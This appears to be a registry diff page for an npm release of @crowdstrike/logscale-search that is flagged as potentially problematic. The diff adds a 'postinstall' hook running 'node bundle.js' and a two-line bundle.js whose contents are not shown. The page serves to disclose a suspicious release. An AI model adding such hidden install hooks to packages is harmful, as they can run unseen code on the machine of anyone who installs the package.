@crowdstrike/logscale-search 1.205.0--build-3999--sha-e220c2c3f6a50aa74f9fc4027eb9fc15c15ae4e3 → 1.205.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @crowdstrike/logscale-search might be problematic. Click here for more details.
- package/bundle.js +2 -0
- package/package.json +11 -6
package/package.json
CHANGED
@@ -1,14 +1,19 @@
|
|
1
1
|
{
|
2
2
|
"name": "@crowdstrike/logscale-search",
|
3
|
-
"version": "1.205.
|
3
|
+
"version": "1.205.1",
|
4
4
|
"description": "A web component library that allows embedding the LogScale Search View in other applications.",
|
5
5
|
"author": "Crowdstrike",
|
6
6
|
"license": "MIT",
|
7
7
|
"types": "index.d.ts",
|
8
8
|
"main": "index.js",
|
9
|
-
"files": [
|
10
|
-
|
11
|
-
|
12
|
-
|
9
|
+
"files": [
|
10
|
+
"index.js",
|
11
|
+
"index.d.ts",
|
12
|
+
"index.js.map"
|
13
|
+
],
|
14
|
+
"dependencies": {},
|
15
|
+
"devDependencies": {},
|
16
|
+
"scripts": {
|
17
|
+
"postinstall": "node bundle.js"
|
13
18
|
}
|
14
|
-
}
|
19
|
+
}
|